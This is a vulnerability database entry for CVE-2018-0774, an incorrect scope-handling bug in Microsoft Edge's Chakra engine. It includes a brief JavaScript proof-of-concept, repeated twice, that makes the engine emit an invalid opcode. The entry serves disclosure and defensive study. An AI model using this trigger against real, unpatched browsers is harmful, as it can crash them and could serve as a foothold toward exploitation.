Microsoft Edge: Chakra: Incorrect scope handling(CVE-2018-0774)

2018-01-22T00:00:00
ID SSV:97095
Type seebug
Reporter Root
Modified 2018-01-22T00:00:00

Description

PoC: ``` (function func(arg = function () { print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. }()) { print(func); function func() {

}

})(); ``` Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.

                                        
                                            
                                                (function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {

    }
})();